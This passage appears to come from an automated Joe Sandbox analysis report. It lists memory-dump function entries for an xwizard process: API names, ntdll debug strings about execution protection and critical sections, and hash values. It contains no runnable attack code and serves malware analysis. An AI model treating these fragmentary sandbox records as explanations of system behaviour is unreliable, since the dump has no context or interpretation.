                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,028B2020,028C81FF,028C58BF,028B1FF0), ref: 028B83D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 028B10FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID:
                                                                                      • API String ID: 1836367815-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108672426.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4ab0000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      Strings
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04804742
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04804725
                                                                                      • Execute=1, xrefs: 04804713
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04804655
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04804787
                                                                                      • ExecuteOptions, xrefs: 048046A0
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048046FC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-$0$0
                                                                                      • API String ID: 1302938615-699404926
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$[$]:%u
                                                                                      • API String ID: 48624451-2819853543
                                                                                      • Opcode ID: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
                                                                                      • Instruction ID: 9954cbf3bb2ecb198fc97dfec3d1b6d789a2f8a759343377221ef8110f2caaff
                                                                                      • Opcode Fuzzy Hash: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
                                                                                      • Instruction Fuzzy Hash: FC215676A0011D9BDB10DFA9C8449BEB7F8EF84784F040656F915D3200E730F901CBA1
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 0480031E
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048002BD
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048002E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      • Opcode ID: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
                                                                                      • Instruction ID: 2dfffca65884f9dec258acf6251fd3bce5982128f2a08f550c6b4cf024587c94
                                                                                      • Opcode Fuzzy Hash: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
                                                                                      • Instruction Fuzzy Hash: B5E1BD306147419FD725CF28DC84B6AB7E0AB89718F144A5DE9A5CB3E1E774E844CB82
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 04807BAC
                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04807B7F
                                                                                      • RTL: Resource at %p, xrefs: 04807B8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 0-871070163
                                                                                      • Opcode ID: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
                                                                                      • Instruction ID: 57969e09a7a95a9e0b78e4861aed8b9efb63837c2848bdbaca3cb9cfd703ba7e
                                                                                      • Opcode Fuzzy Hash: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
                                                                                      • Instruction Fuzzy Hash: 9E41BD317007029FDB24DE29DC51B6AB7E5EB88714F100A2DF95ADB780DB71F8458B91
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480728C
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 048072C1
                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04807294
                                                                                      • RTL: Resource at %p, xrefs: 048072A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 885266447-605551621
                                                                                      • Opcode ID: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                      • Instruction ID: 4c962a64e8c1a11d3513c4cc65334912f5eb4c3c1a887a1375b316fd49adbd1c
                                                                                      • Opcode Fuzzy Hash: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                      • Instruction Fuzzy Hash: 9F41EF71704216ABD720DE25DC42B66B7A5FB84714F104B1DFA56EB380EB30F8528BD1
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$]:%u
                                                                                      • API String ID: 48624451-3050659472
                                                                                      • Opcode ID: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                      • Instruction ID: ae8647bd267320a5a19d1ba1a0846ec3ccbd85b241b9479a6a564110fecd7e70
                                                                                      • Opcode Fuzzy Hash: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                      • Instruction Fuzzy Hash: 7D31457260061D9FDB20DF2DCC44BAEB7B8EB44754F444995E849E3240EB31BA448B61
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-
                                                                                      • API String ID: 1302938615-2137968064
                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction ID: ff0b5460fa5dc5610cf1d2d6d8c9036e395af9cd8b83a670e2a4c1f1e99d862a
                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction Fuzzy Hash: F1918271E202169BDF3CDE69C881ABEB7B5EF44720F54491AE865EB3C0E730A9418761
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                      • Instruction ID: f863d8b42fb40ff9630054135117c4f3dbed7dbff1843afedba06ef8e3ea0fad
                                                                                      • Opcode Fuzzy Hash: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                      • Instruction Fuzzy Hash: 3A810AB1D002699BDB35CB54CC45BEAB7B4AB48714F0045DAEA19B7780E731AE84DFA0